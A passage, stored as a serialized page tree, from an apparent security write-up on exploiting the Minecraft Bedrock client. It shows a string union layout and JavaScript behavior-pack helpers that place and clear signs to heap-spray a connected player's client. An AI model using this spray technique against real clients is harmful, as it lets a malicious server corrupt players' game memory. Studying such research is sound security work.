capacity;\n};\n",[149615],{"type":28,"tag":98,"props":149616,"children":149617},{"__ignoreMap":7},[149618,149629,149636,149648,149664,149688,149695,149706,149718],{"type":28,"tag":116,"props":149619,"children":149620},{"class":245,"line":246},[149621,149625],{"type":28,"tag":116,"props":149622,"children":149623},{"style":376},[149624],{"type":33,"value":9069},{"type":28,"tag":116,"props":149626,"children":149627},{"style":266},[149628],{"type":33,"value":84662},{"type":28,"tag":116,"props":149630,"children":149631},{"class":245,"line":256},[149632],{"type":28,"tag":116,"props":149633,"children":149634},{"style":266},[149635],{"type":33,"value":10547},{"type":28,"tag":116,"props":149637,"children":149638},{"class":245,"line":293},[149639,149644],{"type":28,"tag":116,"props":149640,"children":149641},{"style":376},[149642],{"type":33,"value":149643},"    union",{"type":28,"tag":116,"props":149645,"children":149646},{"style":266},[149647],{"type":33,"value":1291},{"type":28,"tag":116,"props":149649,"children":149650},{"class":245,"line":361},[149651,149656,149660],{"type":28,"tag":116,"props":149652,"children":149653},{"style":376},[149654],{"type":33,"value":149655},"        char",{"type":28,"tag":116,"props":149657,"children":149658},{"style":370},[149659],{"type":33,"value":4240},{"type":28,"tag":116,"props":149661,"children":149662},{"style":266},[149663],{"type":33,"value":16218},{"type":28,"tag":116,"props":149665,"children":149666},{"class":245,"line":387},[149667,149671,149676,149680,149684],{"type":28,"tag":116,"props":149668,"children":149669},{"style":376},[149670],{"type":33,"value":149655},{"type":28,"tag":116,"props":149672,"children":149673},{"style":272},[149674],{"type":33,"value":149675}," buf",{"type":28,"tag":116,"props":149677,"children":149678},{"style":266},[149679],{"type":33,"value":347},{"type":28,"tag":116,"props":149681,"children":149682},{"style":350},[149683],{"type":33,"value":40467},{"type":28,"tag":116,"props":149685,"children":149686},{"style":266},[149687],{"type":33,"value":31223},{"type":28,"tag":116,"props":149689,"children":149690},{"class":245,"line":400},[149691],{"type":28,"tag":116,"props":149692,"children":149693},{"style":266},[149694],{"type":33,"value":38618},{"type":28,"tag":116,"props":149696,"children":149697},{"class":245,"line":614},[149698,149702],{"type":28,"tag":116,"props":149699,"children":149700},{"style":376},[149701],{"type":33,"value":16226},{"type":28,"tag":116,"props":149703,"children":149704},{"style":266},[149705],{"type":33,"value":124215},{"type":28,"tag":116,"props":149707,"children":149708},{"class":245,"line":631},[149709,149713],{"type":28,"tag":116,"props":149710,"children":149711},{"style":376},[149712],{"type":33,"value":16226},{"type":28,"tag":116,"props":149714,"children":149715},{"style":266},[149716],{"type":33,"value":149717}," capacity;\n",{"type":28,"tag":116,"props":149719,"children":149720},{"class":245,"line":665},[149721],{"type":28,"tag":116,"props":149722,"children":149723},{"style":266},[149724],{"type":33,"value":16239},{"type":28,"tag":29,"props":149726,"children":149727},{},[149728,149730,149736,149738,149743],{"type":33,"value":149729},"We are primarily interested in the union: ",{"type":28,"tag":98,"props":149731,"children":149733},{"className":149732},[],[149734],{"type":33,"value":149735},"buf",{"type":33,"value":149737}," is used when the string fits within 16 bytes, while ",{"type":28,"tag":98,"props":149739,"children":149741},{"className":149740},[],[149742],{"type":33,"value":13615},{"type":33,"value":149744}," points to a heap-allocated buffer if the string exceeds that size. The allocated buffer contains only the string’s raw bytes.",{"type":28,"tag":29,"props":149746,"children":149747},{},[149748],{"type":33,"value":149749},"This means that for each sign whose text is longer than 16 bytes, the client allocates a heap buffer equal to the string length.",{"type":28,"tag":29,"props":149751,"children":149752},{},[149753],{"type":33,"value":149754},"This makes signs perfect for our needs - we can fully control the allocation size, lifetime, and contents of the heap buffer.",{"type":28,"tag":443,"props":149756,"children":149758},{"id":149757},"spraying-with-server-side-scripting",[149759],{"type":33,"value":149760},"Spraying With Server-Side Scripting",{"type":28,"tag":29,"props":149762,"children":149763},{},[149764],{"type":33,"value":149765},"The simplest way to automatically manipulate the world is through server-side behavior packs. These packs are written in JavaScript and can control many aspects of the server.",{"type":28,"tag":29,"props":149767,"children":149768},{},[149769,149771,149777,149778,149784],{"type":33,"value":149770},"We wrote ",{"type":28,"tag":98,"props":149772,"children":149774},{"className":149773},[],[149775],{"type":33,"value":149776},"alloc",{"type":33,"value":10659},{"type":28,"tag":98,"props":149779,"children":149781},{"className":149780},[],[149782],{"type":33,"value":149783},"free",{"type":33,"value":149785}," helpers that trigger an allocation in the client and free it on demand:",{"type":28,"tag":234,"props":149787,"children":149789},{"code":149788,"language":35241,"meta":7,"className":35239,"style":7},"// Allocate sign text in the client\nfunction alloc(size, fill=\"A\") {\n    for (let sign of signs) {\n        if (sign.allocated || sign.removed) {\n            continue;\n        }\n\n        sign.sign.setText(fill.repeat(size - 1));\n        sign.allocated = true;\n        return sign;\n    }\n\n    console.warn(\"No more allocs\");\n    return undefined;\n}\n\n// Free an allocated sign in the client\nfunction free(sign) {\n    if (sign == undefined || sign.allocated == false) {\n        return;\n    }\n\n    sign.sign.setText(\"\");\n    sign.allocated = false;\n\n    sign.block.setPermutation(\n        BlockPermutation.resolve(\"minecraft:air\")\n    );\n    sign.removed = true;\n}\n",[149790],{"type":28,"tag":98,"props":149791,"children":149792},{"__ignoreMap":7},[149793,149801,149843,149876,149921,149933,149940,149947,150008,150035,150050,150057,150064,150093,150108,150115,150122,150130,150154,150205,150216,150223,150230,150267,150294,150301,150330,150360,150367,150394],{"type":28,"tag":116,"props":149794,"children":149795},{"class":245,"line":246},[149796],{"type":28,"tag":116,"props":149797,"children":149798},{"style":250},[149799],{"type":33,"value":149800},"// Allocate sign text in the client\n",{"type":28,"tag":116,"props":149802,"children":149803},{"class":245,"line":256},[149804,149808,149813,149817,149821,149825,149830,149834,149839],{"type":28,"tag":116,"props":149805,"children":149806},{"style":376},[149807],{"type":33,"value":830},{"type":28,"tag":116,"props":149809,"children":149810},{"style":282},[149811],{"type":33,"value":149812}," alloc",{"type":28,"tag":116,"props":149814,"children":149815},{"style":266},[149816],{"type":33,"value":313},{"type":28,"tag":116,"props":149818,"children":149819},{"style":272},[149820],{"type":33,"value":123873},{"type":28,"tag":116,"props":149822,"children":149823},{"style":266},[149824],{"type":33,"value":825},{"type":28,"tag":116,"props":149826,"children":149827},{"style":272},[149828],{"type":33,"value":149829},"fill",{"type":28,"tag":116,"props":149831,"children":149832},{"style":370},[149833],{"type":33,"value":373},{"type":28,"tag":116,"props":149835,"children":149836},{"style":563},[149837],{"type":33,"value":149838},"\"A\"",{"type":28,"tag":116,"props":149840,"children":149841},{"style":266},[149842],{"type":33,"value":844},{"type":28,"tag":116,"props":149844,"children":149845},{"class":245,"line":293},[149846,149850,149854,149858,149863,149867,149872],{"type":28,"tag":116,"props":149847,"children":149848},{"style":260},[149849],{"type":33,"value":2703},{"type":28,"tag":116,"props":149851,"children":149852},{"style":266},[149853],{"type":33,"value":269},{"type":28,"tag":116,"props":149855,"children":149856},{"style":376},[149857],{"type":33,"value":11455},{"type":28,"tag":116,"props":149859,"children":149860},{"style":272},[149861],{"type":33,"value":149862}," sign",{"type":28,"tag":116,"props":149864,"children":149865},{"style":376},[149866],{"type":33,"value":10031},{"type":28,"tag":116,"props":149868,"children":149869},{"style":272},[149870],{"type":33,"value":149871}," signs",{"type":28,"tag":116,"props":149873,"children":149874},{"style":266},[149875],{"type":33,"value":844},{"type":28,"tag":116,"props":149877,"children":149878},{"class":245,"line":361},[149879,149883,149887,149892,149896,149901,149905,149909,149913,149917],{"type":28,"tag":116,"props":149880,"children":149881},{"style":260},[149882],{"type":33,"value":2943},{"type":28,"tag":116,"props":149884,"children":149885},{"style":266},[149886],{"type":33,"value":269},{"type":28,"tag":116,"props":149888,"children":149889},{"style":272},[149890],{"type":33,"value":149891},"sign",{"type":28,"tag":116,"props":149893,"children":149894},{"style":266},[149895],{"type":33,"value":141},{"type":28,"tag":116,"props":149897,"children":149898},{"style":272},[149899],{"type":33,"value":149900},"allocated",{"type":28,"tag":116,"props":149902,"children":149903},{"style":370},[149904],{"type":33,"value":23361},{"type":28,"tag":116,"props":149906,"children":149907},{"style":272},[149908],{"type":33,"value":149862},{"type":28,"tag":116,"props":149910,"children":149911},{"style":266},[149912],{"type":33,"value":141},{"type":28,"tag":116,"props":149914,"children":149915},{"style":272},[149916],{"type":33,"value":132576},{"type":28,"tag":116,"props":149918,"children":149919},{"style":266},[149920],{"type":33,"value":844},{"type":28,"tag":116,"props":149922,"children":149923},{"class":245,"line":387},[149924,149929],{"type":28,"tag":116,"props":149925,"children":149926},{"style":260},[149927],{"type":33,"value":149928},"            continue",{"type":28,"tag":116,"props":149930,"children":149931},{"style":266},[149932],{"type":33,"value":384},{"type":28,"tag":116,"props":149934,"children":149935},{"class":245,"line":400},[149936],{"type":28,"tag":116,"props":149937,"children":149938},{"style":266},[149939],{"type":33,"value":1954},{"type":28,"tag":116,"props":149941,"children":149942},{"class":245,"line":614},[149943],{"type":28,"tag":116,"props":149944,"children":149945},{"emptyLinePlaceholder":19},[149946],{"type":33,"value":1044},{"type":28,"tag":116,"props":149948,"children":149949},{"class":245,"line":631},[149950,149955,149959,149963,149967,149972,149976,149980,149984,149988,149992,149996,150000,150004],{"type":28,"tag":116,"props":149951,"children":149952},{"style":272},[149953],{"type":33,"value":149954},"        sign",{"type":28,"tag":116,"props":149956,"children":149957},{"style":266},[149958],{"type":33,"value":141},{"type":28,"tag":116,"props":149960,"children":149961},{"style":272},[149962],{"type":33,"value":149891},{"type":28,"tag":116,"props":149964,"children":149965},{"style":266},[149966],{"type":33,"value":141},{"type":28,"tag":116,"props":149968,"children":149969},{"style":282},[149970],{"type":33,"value":149971},"setText",{"type":28,"tag":116,"props":149973,"children":149974},{"style":266},[149975],{"type":33,"value":313},{"type":28,"tag":116,"props":149977,"children":149978},{"style":272},[149979],{"type":33,"value":149829},{"type":28,"tag":116,"props":149981,"children":149982},{"style":266},[149983],{"type":33,"value":141},{"type":28,"tag":116,"props":149985,"children":149986},{"style":282},[149987],{"type":33,"value":132826},{"type":28,"tag":116,"props":149989,"children":149990},{"style":266},[149991],{"type":33,"value":313},{"type":28,"tag":116,"props":149993,"children":149994},{"style":272},[149995],{"type":33,"value":123873},{"type":28,"tag":116,"props":149997,"children":149998},{"style":370},[149999],{"type":33,"value":50874},{"type":28,"tag":116,"props":150001,"children":150002},{"style":350},[150003],{"type":33,"value":4192},{"type":28,"tag":116,"props":150005,"children":150006},{"style":266},[150007],{"type":33,"value":1929},{"type":28,"tag":116,"props":150009,"children":150010},{"class":245,"line":665},[150011,150015,150019,150023,150027,150031],{"type":28,"tag":116,"props":150012,"children":150013},{"style":272},[150014],{"type":33,"value":149954},{"type":28,"tag":116,"props":150016,"children":150017},{"style":266},[150018],{"type":33,"value":141},{"type":28,"tag":116,"props":150020,"children":150021},{"style":272},[150022],{"type":33,"value":149900},{"type":28,"tag":116,"props":150024,"children":150025},{"style":370},[150026],{"type":33,"value":2226},{"type":28,"tag":116,"props":150028,"children":150029},{"style":376},[150030],{"type":33,"value":1129},{"type":28,"tag":116,"props":150032,"children":150033},{"style":266},[150034],{"type":33,"value":384},{"type":28,"tag":116,"props":150036,"children":150037},{"class":245,"line":713},[150038,150042,150046],{"type":28,"tag":116,"props":150039,"children":150040},{"style":260},[150041],{"type":33,"value":15405},{"type":28,"tag":116,"props":150043,"children":150044},{"style":272},[150045],{"type":33,"value":149862},{"type":28,"tag":116,"props":150047,"children":150048},{"style":266},[150049],{"type":33,"value":384},{"type":28,"tag":116,"props":150051,"children":150052},{"class":245,"line":750},[150053],{"type":28,"tag":116,"props":150054,"children":150055},{"style":266},[150056],{"type":33,"value":3025},{"type":28,"tag":116,"props":150058,"children":150059},{"class":245,"line":779},[150060],{"type":28,"tag":116,"props":150061,"children":150062},{"emptyLinePlaceholder":19},[150063],{"type":33,"value":1044},{"type":28,"tag":116,"props":150065,"children":150066},{"class":245,"line":796},[150067,150071,150075,150080,150084,150089],{"type":28,"tag":116,"props":150068,"children":150069},{"style":272},[150070],{"type":33,"value":31090},{"type":28,"tag":116,"props":150072,"children":150073},{"style":266},[150074],{"type":33,"value":141},{"type":28,"tag":116,"props":150076,"children":150077},{"style":282},[150078],{"type":33,"value":150079},"warn",{"type":28,"tag":116,"props":150081,"children":150082},{"style":266},[150083],{"type":33,"value":313},{"type":28,"tag":116,"props":150085,"children":150086},{"style":563},[150087],{"type":33,"value":150088},"\"No more allocs\"",{"type":28,"tag":116,"props":150090,"children":150091},{"style":266},[150092],{"type":33,"value":895},{"type":28,"tag":116,"props":150094,"children":150095},{"class":245,"line":847},[150096,150100,150104],{"type":28,"tag":116,"props":150097,"children":150098},{"style":260},[150099],{"type":33,"value":393},{"type":28,"tag":116,"props":150101,"children":150102},{"style":376},[150103],{"type":33,"value":38958},{"type":28,"tag":116,"props":150105,"children":150106},{"style":266},[150107],{"type":33,"value":384},{"type":28,"tag":116,"props":150109,"children":150110},{"class":245,"line":898},[150111],{"type":28,"tag":116,"props":150112,"children":150113},{"style":266},[150114],{"type":33,"value":406},{"type":28,"tag":116,"props":150116,"children":150117},{"class":245,"line":907},[150118],{"type":28,"tag":116,"props":150119,"children":150120},{"emptyLinePlaceholder":19},[150121],{"type":33,"value":1044},{"type":28,"tag":116,"props":150123,"children":150124},{"class":245,"line":981},[150125],{"type":28,"tag":116,"props":150126,"children":150127},{"style":250},[150128],{"type":33,"value":150129},"// Free an allocated sign in the client\n",{"type":28,"tag":116,"props":150131,"children":150132},{"class":245,"line":1011},[150133,150137,150142,150146,150150],{"type":28,"tag":116,"props":150134,"children":150135},{"style":376},[150136],{"type":33,"value":830},{"type":28,"tag":116,"props":150138,"children":150139},{"style":282},[150140],{"type":33,"value":150141}," free",{"type":28,"tag":116,"props":150143,"children":150144},{"style":266},[150145],{"type":33,"value":313},{"type":28,"tag":116,"props":150147,"children":150148},{"style":272},[150149],{"type":33,"value":149891},{"type":28,"tag":116,"props":150151,"children":150152},{"style":266},[150153],{"type":33,"value":844},{"type":28,"tag":116,"props":150155,"children":150156},{"class":245,"line":1029},[150157,150161,150165,150169,150173,150177,150181,150185,150189,150193,150197,150201],{"type":28,"tag":116,"props":150158,"children":150159},{"style":260},[150160],{"type":33,"value":11947},{"type":28,"tag":116,"props":150162,"children":150163},{"style":266},[150164],{"type":33,"value":269},{"type":28,"tag":116,"props":150166,"children":150167},{"style":272},[150168],{"type":33,"value":149891},{"type":28,"tag":116,"props":150170,"children":150171},{"style":370},[150172],{"type":33,"value":2953},{"type":28,"tag":116,"props":150174,"children":150175},{"style":376},[150176],{"type":33,"value":38958},{"type":28,"tag":116,"props":150178,"children":150179},{"style":370},[150180],{"type":33,"value":23361},{"type":28,"tag":116,"props":150182,"children":150183},{"style":272},[150184],{"type":33,"value":149862},{"type":28,"tag":116,"props":150186,"children":150187},{"style":266},[150188],{"type":33,"value":141},{"type":28,"tag":116,"props":150190,"children":150191},{"style":272},[150192],{"type":33,"value":149900},{"type":28,"tag":116,"props":150194,"children":150195},{"style":370},[150196],{"type":33,"value":2953},{"type":28,"tag":116,"props":150198,"children":150199},{"style":376},[150200],{"type":33,"value":1022},{"type":28,"tag":116,"props":150202,"children":150203},{"style":266},[150204],{"type":33,"value":844},{"type":28,"tag":116,"props":150206,"children":150207},{"class":245,"line":1038},[150208,150212],{"type":28,"tag":116,"props":150209,"children":150210},{"style":260},[150211],{"type":33,"value":15405},{"type":28,"tag":116,"props":150213,"children":150214},{"style":266},[150215],{"type":33,"value":384},{"type":28,"tag":116,"props":150217,"children":150218},{"class":245,"line":1047},[150219],{"type":28,"tag":116,"props":150220,"children":150221},{"style":266},[150222],{"type":33,"value":3025},{"type":28,"tag":116,"props":150224,"children":150225},{"class":245,"line":1071},[150226],{"type":28,"tag":116,"props":150227,"children":150228},{"emptyLinePlaceholder":19},[150229],{"type":33,"value":1044},{"type":28,"tag":116,"props":150231,"children":150232},{"class":245,"line":1137},[150233,150238,150242,150246,150250,150254,150258,150263],{"type":28,"tag":116,"props":150234,"children":150235},{"style":272},[150236],{"type":33,"value":150237},"    sign",{"type":28,"tag":116,"props":150239,"children":150240},{"style":266},[150241],{"type":33,"value":141},{"type":28,"tag":116,"props":150243,"children":150244},{"style":272},[150245],{"type":33,"value":149891},{"type":28,"tag":116,"props":150247,"children":150248},{"style":266},[150249],{"type":33,"value":141},{"type":28,"tag":116,"props":150251,"children":150252},{"style":282},[150253],{"type":33,"value":149971},{"type":28,"tag":116,"props":150255,"children":150256},{"style":266},[150257],{"type":33,"value":313},{"type":28,"tag":116,"props":150259,"children":150260},{"style":563},[150261],{"type":33,"value":150262},"\"\"",{"type":28,"tag":116,"props":150264,"children":150265},{"style":266},[150266],{"type":33,"value":895},{"type":28,"tag":116,"props":150268,"children":150269},{"class":245,"line":1181},[150270,150274,150278,150282,150286,150290],{"type":28,"tag":116,"props":150271,"children":150272},{"style":272},[150273],{"type":33,"value":150237},{"type":28,"tag":116,"props":150275,"children":150276},{"style":266},[150277],{"type":33,"value":141},{"type":28,"tag":116,"props":150279,"children":150280},{"style":272},[150281],{"type":33,"value":149900},{"type":28,"tag":116,"props":150283,"children":150284},{"style":370},[150285],{"type":33,"value":2226},{"type":28,"tag":116,"props":150287,"children":150288},{"style":376},[150289],{"type":33,"value":1022},{"type":28,"tag":116,"props":150291,"children":150292},{"style":266},[150293],{"type":33,"value":384},{"type":28,"tag":116,"props":150295,"children":150296},{"class":245,"line":1212},[150297],{"type":28,"tag":116,"props":150298,"children":150299},{"emptyLinePlaceholder":19},[150300],{"type":33,"value":1044},{"type":28,"tag":116,"props":150302,"children":150303},{"class":245,"line":1254},[150304,150308,150312,150317,150321,150326],{"type":28,"tag":116,"props":150305,"children":150306},{"style":272},[150307],{"type":33,"value":150237},{"type":28,"tag":116,"props":150309,"children":150310},{"style":266},[150311],{"type":33,"value":141},{"type":28,"tag":116,"props":150313,"children":150314},{"style":272},[150315],{"type":33,"value":150316},"block",{"type":28,"tag":116,"props":150318,"children":150319},{"style":266},[150320],{"type":33,"value":141},{"type":28,"tag":116,"props":150322,"children":150323},{"style":282},[150324],{"type":33,"value":150325},"setPermutation",{"type":28,"tag":116,"props":150327,"children":150328},{"style":266},[150329],{"type":33,"value":3133},{"type":28,"tag":116,"props":150331,"children":150332},{"class":245,"line":1262},[150333,150338,150342,150347,150351,150356],{"type":28,"tag":116,"props":150334,"children":150335},{"style":272},[150336],{"type":33,"value":150337},"        BlockPermutation",{"type":28,"tag":116,"props":150339,"children":150340},{"style":266},[150341],{"type":33,"value":141},{"type":28,"tag":116,"props":150343,"children":150344},{"style":282},[150345],{"type":33,"value":150346},"resolve",{"type":28,"tag":116,"props":150348,"children":150349},{"style":266},[150350],{"type":33,"value":313},{"type":28,"tag":116,"props":150352,"children":150353},{"style":563},[150354],{"type":33,"value":150355},"\"minecraft:air\"",{"type":28,"tag":116,"props":150357,"children":150358},{"style":266},[150359],{"type":33,"value":2830},{"type":28,"tag":116,"props":150361,"children":150362},{"class":245,"line":1294},[150363],{"type":28,"tag":116,"props":150364,"children":150365},{"style":266},[150366],{"type":33,"value":43279},{"type":28,"tag":116,"props":150368,"children":150369},{"class":245,"line":1334},[150370,150374,150378,150382,150386,150390],{"type":28,"tag":116,"props":150371,"children":150372},{"style":272},[150373],{"type":33,"value":150237},{"type":28,"tag":116,"props":150375,"children":150376},{"style":266},[150377],{"type":33,"value":141},{"type":28,"tag":116,"props":150379,"children":150380},{"style":272},[150381],{"type":33,"value":132576},{"type":28,"tag":116,"props":150383,"children":150384},{"style":370},[150385],{"type":33,"value":2226},{"type":28,"tag":116,"props":150387,"children":150388},{"style":376},[150389],{"type":33,"value":1129},{"type":28,"tag":116,"props":150391,"children":150392},{"style":266},[150393],{"type":33,"value":384},{"type":28,"tag":116,"props":150395,"children":150396},{"class":245,"line":1372},[150397],{"type":28,"tag":116,"props":150398,"children":150399},{"style":266},[150400],{"type":33,"value":406},{"type":28,"tag":29,"props":150402,"children":150403},{},[150404,150406,150412],{"type":33,"value":150405},"These functions will be used to perform the heap spray. Before that, we need to populate the ",{"type":28,"tag":98,"props":150407,"children":150409},{"className":150408},[],[150410],{"type":33,"value":150411},"signs",{"type":33,"value":150413}," array. For this, we generate a wall of signs when a player joins, and remove it after they leave:",{"type":28,"tag":234,"props":150415,"children":150417},{"code":150416,"language":35241,"meta":7,"className":35239,"style":7},"let signs;\n\nfunction create_wall() {\n    signs = [];\n\n    for (let current_y = 0; current_y \u003C WALL_HEIGHT; current_y++) {\n        for (let current_x = 0; current_x \u003C WALL_WIDTH; current_x++) {\n\n            [...]\n            \n            const sign_block = world\n                .getDimension(\"overworld\")\n                .getBlock(sign_location);\n            sign_block.setPermutation(\n                BlockPermutation.resolve(\"minecraft:wall_sign\", {\n                    facing_direction: 3\n                }\n            ));\n            let sign_component = sign_block\n                .getComponent(BlockComponentTypes.Sign);\n\n            signs.push({\n                sign: sign_component,\n                allocated: false,\n                block: sign_block,\n                removed: false\n            });\n        }\n    }\n}\n\nfunction remove_wall() {\n    signs = [];\n    \n    for (let current_y = 0; current_y \u003C WALL_HEIGHT; current_y++) {\n        for (let current_x = 0; current_x \u003C WALL_WIDTH; current_x++) {\n            \n            [...]\n             \n            const sign_block = await wait_for_block(\n                world.getDimension(\"overworld\"),\n                sign_location\n            );\n            sign_block.setPermutation(\n                BlockPermutation.resolve(\"minecraft:air\")\n            );\n\n            [...]\n        }\n    }\n}\n\nworld.afterEvents.playerSpawn.subscribe((arg) => {\n    create_wall();\n});\n\nworld.beforeEvents.playerLeave.subscribe(async (arg) => {\n    remove_wall();\n});\n",[150418],{"type":28,"tag":98,"props":150419,"children":150420},{"__ignoreMap":7},[150421,150436,150443,150459,150476,150483,150545,150607,150614,150630,150638,150659,150685,150710,150730,150759,150771,150778,150786,150808,150842,150849,150869,150885,150901,150917,150929,150937,150944,150951,150958,150965,150981,150996,151003,151062,151121,151128,151143,151151,151179,151207,151215,151222,151241,151268,151275,151282,151297,151304,151311,151318,151325,151381,151393,151400,151407,151468,151480],{"type":28,"tag":116,"props":150422,"children":150423},{"class":245,"line":246},[150424,150428,150432],{"type":28,"tag":116,"props":150425,"children":150426},{"style":376},[150427],{"type":33,"value":11455},{"type":28,"tag":116,"props":150429,"children":150430},{"style":272},[150431],{"type":33,"value":149871},{"type":28,"tag":116,"props":150433,"children":150434},{"style":266},[150435],{"type":33,"value":384},{"type":28,"tag":116,"props":150437,"children":150438},{"class":245,"line":256},[150439],{"type":28,"tag":116,"props":150440,"children":150441},{"emptyLinePlaceholder":19},[150442],{"type":33,"value":1044},{"type":28,"tag":116,"props":150444,"children":150445},{"class":245,"line":293},[150446,150450,150455],{"type":28,"tag":116,"props":150447,"children":150448},{"style":376},[150449],{"type":33,"value":830},{"type":28,"tag":116,"props":150451,"children":150452},{"style":282},[150453],{"type":33,"value":150454}," create_wall",{"type":28,"tag":116,"props":150456,"children":150457},{"style":266},[150458],{"type":33,"value":1068},{"type":28,"tag":116,"props":150460,"children":150461},{"class":245,"line":361},[150462,150467,150471],{"type":28,"tag":116,"props":150463,"children":150464},{"style":272},[150465],{"type":33,"value":150466},"    signs",{"type":28,"tag":116,"props":150468,"children":150469},{"style":370},[150470],{"type":33,"value":2226},{"type":28,"tag":116,"props":150472,"children":150473},{"style":266},[150474],{"type":33,"value":150475}," [];\n",{"type":28,"tag":116,"props":150477,"children":150478},{"class":245,"line":387},[150479],{"type":28,"tag":116,"props":150480,"children":150481},{"emptyLinePlaceholder":19},[150482],{"type":33,"value":1044},{"type":28,"tag":116,"props":150484,"children":150485},{"class":245,"line":400},[150486,150490,150494,150498,150503,150507,150511,150515,150520,150524,150529,150533,150537,150541],{"type":28,"tag":116,"props":150487,"children":150488},{"style":260},[150489],{"type":33,"value":2703},{"type":28,"tag":116,"props":150491,"children":150492},{"style":266},[150493],{"type":33,"value":269},{"type":28,"tag":116,"props":150495,"children":150496},{"style":376},[150497],{"type":33,"value":11455},{"type":28,"tag":116,"props":150499,"children":150500},{"style":272},[150501],{"type":33,"value":150502}," current_y",{"type":28,"tag":116,"props":150504,"children":150505},{"style":370},[150506],{"type":33,"value":2226},{"type":28,"tag":116,"props":150508,"children":150509},{"style":350},[150510],{"type":33,"value":2718},{"type":28,"tag":116,"props":150512,"children":150513},{"style":266},[150514],{"type":33,"value":16888},{"type":28,"tag":116,"props":150516,"children":150517},{"style":272},[150518],{"type":33,"value":150519},"current_y",{"type":28,"tag":116,"props":150521,"children":150522},{"style":370},[150523],{"type":33,"value":8391},{"type":28,"tag":116,"props":150525,"children":150526},{"style":272},[150527],{"type":33,"value":150528}," WALL_HEIGHT",{"type":28,"tag":116,"props":150530,"children":150531},{"style":266},[150532],{"type":33,"value":16888},{"type":28,"tag":116,"props":150534,"children":150535},{"style":272},[150536],{"type":33,"value":150519},{"type":28,"tag":116,"props":150538,"children":150539},{"style":370},[150540],{"type":33,"value":50888},{"type":28,"tag":116,"props":150542,"children":150543},{"style":266},[150544],{"type":33,"value":844},{"type":28,"tag":116,"props":150546,"children":150547},{"class":245,"line":614},[150548,150552,150556,150560,150565,150569,150573,150577,150582,150586,150591,150595,150599,150603],{"type":28,"tag":116,"props":150549,"children":150550},{"style":260},[150551],{"type":33,"value":60195},{"type":28,"tag":116,"props":150553,"children":150554},{"style":266},[150555],{"type":33,"value":269},{"type":28,"tag":116,"props":150557,"children":150558},{"style":376},[150559],{"type":33,"value":11455},{"type":28,"tag":116,"props":150561,"children":150562},{"style":272},[150563],{"type":33,"value":150564}," current_x",{"type":28,"tag":116,"props":150566,"children":150567},{"style":370},[150568],{"type":33,"value":2226},{"type":28,"tag":116,"props":150570,"children":150571},{"style":350},[150572],{"type":33,"value":2718},{"type":28,"tag":116,"props":150574,"children":150575},{"style":266},[150576],{"type":33,"value":16888},{"type":28,"tag":116,"props":150578,"children":150579},{"style":272},[150580],{"type":33,"value":150581},"current_x",{"type":28,"tag":116,"props":150583,"children":150584},{"style":370},[150585],{"type":33,"value":8391},{"type":28,"tag":116,"props":150587,"children":150588},{"style":272},[150589],{"type":33,"value":150590}," WALL_WIDTH",{"type":28,"tag":116,"props":150592,"children":150593},{"style":266},[150594],{"type":33,"value":16888},{"type":28,"tag":116,"props":150596,"children":150597},{"style":272},[150598],{"type":33,"value":150581},{"type":28,"tag":116,"props":150600,"children":150601},{"style":370},[150602],{"type":33,"value":50888},{"type":28,"tag":116,"props":150604,"children":150605},{"style":266},[150606],{"type":33,"value":844},{"type":28,"tag":116,"props":150608,"children":150609},{"class":245,"line":631},[150610],{"type":28,"tag":116,"props":150611,"children":150612},{"emptyLinePlaceholder":19},[150613],{"type":33,"value":1044},{"type":28,"tag":116,"props":150615,"children":150616},{"class":245,"line":665},[150617,150622,150626],{"type":28,"tag":116,"props":150618,"children":150619},{"style":266},[150620],{"type":33,"value":150621},"            [",{"type":28,"tag":116,"props":150623,"children":150624},{"style":370},[150625],{"type":33,"value":9259},{"type":28,"tag":116,"props":150627,"children":150628},{"style":266},[150629],{"type":33,"value":11440},{"type":28,"tag":116,"props":150631,"children":150632},{"class":245,"line":713},[150633],{"type":28,"tag":116,"props":150634,"children":150635},{"style":266},[150636],{"type":33,"value":150637},"            \n",{"type":28,"tag":116,"props":150639,"children":150640},{"class":245,"line":750},[150641,150645,150650,150654],{"type":28,"tag":116,"props":150642,"children":150643},{"style":376},[150644],{"type":33,"value":1077},{"type":28,"tag":116,"props":150646,"children":150647},{"style":272},[150648],{"type":33,"value":150649}," sign_block",{"type":28,"tag":116,"props":150651,"children":150652},{"style":370},[150653],{"type":33,"value":2226},{"type":28,"tag":116,"props":150655,"children":150656},{"style":272},[150657],{"type":33,"value":150658}," world\n",{"type":28,"tag":116,"props":150660,"children":150661},{"class":245,"line":779},[150662,150667,150672,150676,150681],{"type":28,"tag":116,"props":150663,"children":150664},{"style":266},[150665],{"type":33,"value":150666},"                .",{"type":28,"tag":116,"props":150668,"children":150669},{"style":282},[150670],{"type":33,"value":150671},"getDimension",{"type":28,"tag":116,"props":150673,"children":150674},{"style":266},[150675],{"type":33,"value":313},{"type":28,"tag":116,"props":150677,"children":150678},{"style":563},[150679],{"type":33,"value":150680},"\"overworld\"",{"type":28,"tag":116,"props":150682,"children":150683},{"style":266},[150684],{"type":33,"value":2830},{"type":28,"tag":116,"props":150686,"children":150687},{"class":245,"line":796},[150688,150692,150697,150701,150706],{"type":28,"tag":116,"props":150689,"children":150690},{"style":266},[150691],{"type":33,"value":150666},{"type":28,"tag":116,"props":150693,"children":150694},{"style":282},[150695],{"type":33,"value":150696},"getBlock",{"type":28,"tag":116,"props":150698,"children":150699},{"style":266},[150700],{"type":33,"value":313},{"type":28,"tag":116,"props":150702,"children":150703},{"style":272},[150704],{"type":33,"value":150705},"sign_location",{"type":28,"tag":116,"props":150707,"children":150708},{"style":266},[150709],{"type":33,"value":895},{"type":28,"tag":116,"props":150711,"children":150712},{"class":245,"line":847},[150713,150718,150722,150726],{"type":28,"tag":116,"props":150714,"children":150715},{"style":272},[150716],{"type":33,"value":150717},"            sign_block",{"type":28,"tag":116,"props":150719,"children":150720},{"style":266},[150721],{"type":33,"value":141},{"type":28,"tag":116,"props":150723,"children":150724},{"style":282},[150725],{"type":33,"value":150325},{"type":28,"tag":116,"props":150727,"children":150728},{"style":266},[150729],{"type":33,"value":3133},{"type":28,"tag":116,"props":150731,"children":150732},{"class":245,"line":898},[150733,150738,150742,150746,150750,150755],{"type":28,"tag":116,"props":150734,"children":150735},{"style":272},[150736],{"type":33,"value":150737},"                